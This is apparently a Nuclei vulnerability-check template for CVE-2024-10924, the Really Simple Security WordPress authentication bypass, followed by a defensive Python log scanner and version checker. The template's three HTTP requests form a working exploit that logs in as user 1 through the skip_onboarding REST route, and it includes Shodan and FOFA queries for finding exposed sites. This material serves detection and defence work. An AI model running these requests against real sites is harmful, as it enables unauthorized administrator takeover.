Really Simple Security < 9.1.2 - Authentication Bypass in WordPress
id: CVE-2024-10924

info:
  name: Really Simple Security < 9.1.2 - Authentication Bypass
  author: yaser_s
  severity: critical
  description: |
    The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
  remediation: Fixed in 9.1.2
  reference:
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L277
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L278
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L67
    - https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
    - https://wpscan.com/vulnerability/8e1f4374-2e41-4c27-80d4-db172015c6be/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d5d05ad-1a7a-43d2-bbbf-597e975446be?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10924
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10924
    cwe-id: CWE-288,CWE-306
    epss-score: 0.00101
    epss-percentile: 0.4287
    cpe: cpe:2.3:a:really-simple-plugins:really_simple_security:*:*:*:*:-:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: really-simple-plugins
    product: really_simple_security
    framework: wordpress
    shodan-query: html:"/wp-content/plugins/really-simple-ssl"
    fofa-query: body="/wp-content/plugins/really-simple-ssl"
  tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body_1
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)"\}'
        internal: true

  - raw:
      - |
        POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "user_id": 1,
          "login_nonce": "{{nonce}}",
          "redirect_to": "/wp-admin/"
        }

    matchers:
      - type: word
        part: body
        words:
          - '"redirect_to":"\/wp-admin\/"'
        internal: true

  - raw:
      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Personal Options'

      - type: word
        part: content_type
        words:
          - 'text/html'
# digest: 490a0046304402204abade2aba55b6eea42a22ccf1591c5d83ea31d23f9f492ab7347d8bba93aba00220193ab92d79c45b7af0695a5f7e846ac7ea1183dce997bc97b0647b1382c3aa8a:922c64590222798bb761d5b6d8e72950
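The template above relies on the `two_fa/skip_onboarding` REST action being reachable without a session. On the defensive side, the two things a site operator wants are a quick check of whether an installed plugin version falls in the affected range (9.0.0 through 9.1.1.1, fixed in 9.1.2) and a way to spot calls to that route in web server access logs. The Python below is an added example written for this page; it is not part of the Nuclei template or of the plugin. It assumes combined-format access logs (nginx/Apache default) and uses constructed sample log lines, including both route spellings WordPress accepts (`?rest_route=` and `/wp-json/`).

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# The REST route WordPress exposes for the plugin's two-factor actions, in both
# spellings: the pretty-permalink form (/wp-json/...) and the query-string form
# (/?rest_route=...). The action name is captured so findings can be grouped.
TWO_FA_ROUTE = re.compile(
    r"(?:/wp-json/reallysimplessl/v1/two_fa/|[?&]rest_route=/reallysimplessl/v1/two_fa/)"
    r"(?P<action>[a-z_]+)"
)

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


@dataclass
class Finding:
    ip: str
    timestamp: str
    action: str
    status: int


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '9.1.1.1' into (9, 1, 1, 1); tuple comparison handles mixed lengths."""
    return tuple(int(p) for p in v.split("."))


def is_vulnerable_version(v: str) -> bool:
    """Affected range from the advisory: 9.0.0 up to and including 9.1.1.1."""
    return parse_version("9.0.0") <= parse_version(v) < parse_version("9.1.2")


def scan_log(lines: Iterable[str]) -> List[Finding]:
    """Return every POST to a two_fa REST action, whatever its status code."""
    findings: List[Finding] = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        route = TWO_FA_ROUTE.search(m["path"])
        if route and m["method"] == "POST":
            findings.append(Finding(m["ip"], m["ts"], route["action"], int(m["status"])))
    return findings


def alerts(findings: List[Finding]) -> List[Finding]:
    """Keep only calls the server accepted (2xx). A blocked or missing route is
    noise; an accepted skip_onboarding from a client with no prior login is the
    event worth escalating, especially when followed by /wp-admin/ requests."""
    return [f for f in findings if 200 <= f.status < 300]


# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Nov/2024:10:15:01 +0000] "GET /wp-login.php HTTP/1.1" 200 5123
203.0.113.7 - - [18/Nov/2024:10:15:02 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 86
203.0.113.7 - - [18/Nov/2024:10:15:03 +0000] "GET /wp-admin/profile.php HTTP/1.1" 200 41230
198.51.100.4 - - [18/Nov/2024:10:20:00 +0000] "GET /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 404 0
192.0.2.9 - - [18/Nov/2024:11:00:00 +0000] "POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 403 48
""".splitlines()


if __name__ == "__main__":
    for ver in ("8.3.0", "9.0.0", "9.1.1.1", "9.1.2"):
        print(f"{ver}: {'affected' if is_vulnerable_version(ver) else 'not affected'}")
    for f in alerts(scan_log(SAMPLE_LOG)):
        print(f"ALERT {f.timestamp} {f.ip} accepted two_fa/{f.action} (HTTP {f.status})")
```

Only the first client in the sample produces an alert: its POST to `skip_onboarding` was accepted and is immediately followed by a `/wp-admin/profile.php` fetch, the same sequence the template's third request checks for. The 403 and the GET-with-404 are reported by `scan_log` but dropped by `alerts`, so a site that has already updated past 9.1.2 or blocked the route at the web server does not page anyone.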